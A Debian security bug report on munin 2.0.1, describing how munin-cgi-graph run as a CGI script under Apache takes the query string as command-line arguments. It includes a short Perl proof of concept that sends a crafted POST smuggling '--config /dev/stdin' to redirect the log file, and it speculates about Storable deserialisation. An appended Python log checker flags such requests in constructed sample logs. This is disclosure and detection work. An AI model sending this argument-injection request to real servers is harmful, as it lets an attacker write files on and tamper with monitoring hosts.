Package: munin
Version: 2.0.1-1
Severity: grave
Tags: security
X-Debbugs-CC: hel...@subdivi.de

http://www.munin-monitoring.org/ticket/1238

When running munin-cgi-graph as a CGI-script (not FastCGI) under Apache2, Apache2 may use the query-string as command line arguments.

This will write "2012/07/04 18:03:57 Opened log file" to /tmp/123.txt (this didn't work for helmut, but ?--help also demonstrated the problem):

    my $data = "logdir /tmp/123.txt\0\n";
    print "POST /cgi-bin/munin-cgi-graph/x.png?--config+/dev/stdin HTTP/1.1\r\n" .
          "Host: 127.0.0.1\r\n" .
          "Connection: close\r\n" .
          "Content-Length: ".length($data)."\r\n" .
          "\r\n" .
          $data;

munin will check the query-string for bad characters after opening the log file and terminate, limiting the possible damage.

munin will also try opening "$conf.storable" using perl's Storable module. I'm not sure if this can be used to provide code execution like python's pickle.
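
Added example, not part of the original report and not munin or Apache code: a log check that reconstructs the argument list a CGI script would receive from a request and flags hits on munin-cgi-graph where an argument looks like an option. It assumes the CGI "indexed query" rule from RFC 3875 section 4.4 (a query string with no unencoded "=" is split on "+" and percent-decoded), an Apache common/combined access log, and the script path shown in the report; the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Request line inside an Apache common/combined access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CGI_PATH = "/cgi-bin/munin-cgi-graph"  # script path as shown in the report


def cgi_argv(target):
    """Return the argv a CGI script would receive for this request target.

    A query string with no unencoded '=' is split on '+' and each piece
    is percent-decoded; any other query string yields no arguments.
    """
    _, sep, query = target.partition("?")
    if not sep or not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+")]


def suspicious_requests(log_lines, cgi_path=CGI_PATH):
    """Return (line_no, argv) for hits on cgi_path whose argv holds an option."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m or not m.group("target").startswith(cgi_path):
            continue
        argv = cgi_argv(m.group("target"))
        if any(arg.startswith("-") for arg in argv):
            hits.append((no, argv))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2012:18:03:57 +0000] "POST /cgi-bin/munin-cgi-graph/x.png?--config+/dev/stdin HTTP/1.1" 200 512',
    '192.0.2.11 - - [04/Jul/2012:18:04:10 +0000] "GET /cgi-bin/munin-cgi-graph/x.png?a=1&b=2 HTTP/1.1" 200 20480',
    '192.0.2.12 - - [04/Jul/2012:18:05:02 +0000] "GET /cgi-bin/munin-cgi-graph/x.png?%2D%2Dhelp HTTP/1.1" 200 300',
    '192.0.2.13 - - [04/Jul/2012:18:06:00 +0000] "GET /index.html?--help HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for no, argv in suspicious_requests(SAMPLE_LOG):
        print(f"line {no}: argv would be {argv}")
```

Normal graph requests carry key=value parameters and produce an empty argv, so any non-empty result for this path is worth reviewing.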